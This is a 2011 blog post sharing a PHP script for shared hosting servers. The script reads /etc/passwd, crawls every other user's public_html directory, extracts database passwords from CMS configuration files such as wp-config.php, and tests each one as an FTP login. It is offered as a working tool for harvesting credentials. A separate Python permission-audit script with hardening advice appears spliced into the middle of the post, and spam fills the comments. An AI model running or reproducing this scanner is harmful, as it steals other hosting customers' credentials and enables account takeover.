bugishere

Database Scanner {PHP} without Malware [NEW]

Posted on: June 27, 2011

I don’t know why my old database scanner can’t be used now, so I’m going to share my other database scanner, which is used to look for configuration files (the files that connect a CMS application to its database).

<?php

echo “<html>”;

echo “<title>[ panteng-database scanner]</title><body>”;

set_time_limit(0);

##################

@$passwd=fopen(‘/etc/passwd’,’r’);

if (!$passwd) {

echo “[-] Error : Can’t read /etc/passwd”;

exit;

}

$path_to_public=array();

$users=array();

$pathtoconf=array();

$i=0;

while(!feof($passwd)) {

$str=fgets($passwd);

if ($i>35) {

$pos=strpos($str,”:”);

$username=substr($str,0,$pos);

$dirz=”/home/$username/public_html/”;

if (($username!=””)) {

if (is_readable($dirz)) {

array_push($users,$username);

array_push($path_to_public,$dirz);

}

}

}

$i++;

}

###################

#########################

echo “<br><br>”;

echo “<textarea name=’main_window’ cols=100 rows=20>”;

echo “[+] Founded “.sizeof($users).” entrys in /etc/passwd\n”;

echo “[+] Founded “.sizeof($path_to_public).” readable public_html directories\n”;

echo “[~] Searching for passwords in config.* files…\n\n”;

foreach ($users as $user) {

$path=”/home/$user/public_html/”;

read_dir($path,$user);

}

echo “\n[+] Done\n”;

function read_dir($path,$username) {

if ($handle = opendir($path)) {

while (false !== ($file = readdir($handle))) {

$fpath=”$path$file”;

if (($file!=’.’) and ($file!=’..’)) {

if (is_readable($fpath)) {

$dr=”$fpath/”;

if (is_dir($dr)) {

read_dir($dr,$username);

}

else {

if (($file==’config.php’) or ($file==’header.inc.php’) or ($file==’content.inc.php’) or ($file==’mainfile.php’) or ($file==’utils.inc.php’) or ($file==’main.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’configuration.php’) or ($file==’configurations.php’) or ($file==’configs.php’) or ($file==’config.locale.php’) or ($file==’db.inc.php’) or ($file==’dbconnect.inc.php’) or ($file==’dbconnection.php’) or ($file==’var.php’) or ($file==’mysql.php’) or ($file==’global.inc.php’) or ($file==’database.php’) or ($file==’dbconnect.php’) or ($file==’conf.php’) or ($file==’configDB.inc.php’) or ($file==’db.php’) or ($file==’db_connect.php’)) {

$pass=get_pass($fpath);

if ($pass!=”) {

echo “[+] $fpath\n$pass\n”;

ftp_check($username,$pass);

}

}

}

}

}

}

}

}

function get_pass($link) {

@$config=fopen($link,’r’);

while(!feof($config)) {

$line=fgets($config);

if (strstr($line,’pass’) or strstr($line,’password’) or strstr($line,’passwd’)) {

if (strrpos($line,'”‘))

$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,'”‘)-(strpos($line,’=’)+3)));

else

$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,”‘”)-(strpos($line,’=’)+3)));

return $pass;

}

}

}

function ftp_check($login,$pass) {

@$ftp=ftp_connect(‘127.0.0.1’);

if ($ftp) {

@$res=ftp_login($ftp,$login,$pass);

if ($res) {

echo ‘[FTP] ‘.$login.’:’.$pass.”  Success\n”;

}

else ftp_quit($ftp);

}

}

echo “</textarea><br>”;

echo “</body></html>”;

?>

Have fun, all… This application only works on Linux and its family, or on other server OSes that support PHP.
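The script's `is_readable()` checks only succeed on hosts where one account can read another account's `public_html` tree and config files. As an added example (not code from the original post), this Python audit flags such files in a site tree you own by their permission bits and restricts them to the owner. The file-name set is a subset of the script's list, the sample tree is constructed, and mode `0600` assumes PHP runs as the file owner (suEXEC or per-user PHP-FPM).

```python
import os
import stat
import tempfile

# File names the posted script looks for (subset copied from its list).
CONFIG_NAMES = {
    "config.php", "wp-config.php", "configuration.php", "config.inc.php",
    "db.php", "db.inc.php", "dbconnect.php", "database.php", "connect.php",
}

def audit_tree(root):
    """Return [(path, octal_mode)] for config files other local users can read."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        for name in filenames:
            if name not in CONFIG_NAMES:
                continue
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks and special files
            if st.st_mode & stat.S_IROTH:  # "other" read bit set
                findings.append((path, oct(stat.S_IMODE(st.st_mode))))
    return sorted(findings)

def harden(path, mode=0o600):
    """Restrict a config file to its owner (assumes PHP runs as that owner)."""
    os.chmod(path, mode)

def demo():
    """Build a constructed public_html tree, audit it, fix it, audit again."""
    with tempfile.TemporaryDirectory() as root:
        site = os.path.join(root, "public_html", "blog")
        os.makedirs(site)
        exposed = os.path.join(site, "wp-config.php")
        private = os.path.join(root, "public_html", "config.php")
        for p, mode in ((exposed, 0o644), (private, 0o600)):
            with open(p, "w") as fh:
                fh.write("<?php // constructed sample, no real credentials\n")
            os.chmod(p, mode)
        before = [(os.path.relpath(p, root), m) for p, m in audit_tree(root)]
        for p, _ in audit_tree(root):
            harden(p)
        return before, audit_tree(root)

if __name__ == "__main__":
    print(demo())
```

Where PHP runs as the web server user instead (mod_php), `0640` with the web server's group is the equivalent setting, and the home directory itself should not be traversable by other accounts.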

5 Responses to "Database Scanner {PHP} without Malware [NEW]"

nice posting… thanks for this scanner

Maybe one day you’ll be able to get your phone to talk to you using your own voice if you’re one of those people that likes to hear yourself talk.

This is a message to the webmaster. Does your website get enough traffic or not rank for keywords with Google? Well we can help! We can provide you with tens of thousands of backlinks to your site! This will help your rankings in the search engines and make your website more visible to your target audience. Take a look as I am sure you will be interested. http://www.linklegends.com

Hi, really loving the design of your website. Would you mind if I asked you what theme you’re making use of here? I’m new to this, but I’m hoping to have mine looking nearly as cool as yours. Thanks a lot.

Keep it up dude your blog is rocking waiting for more stuff, thanks
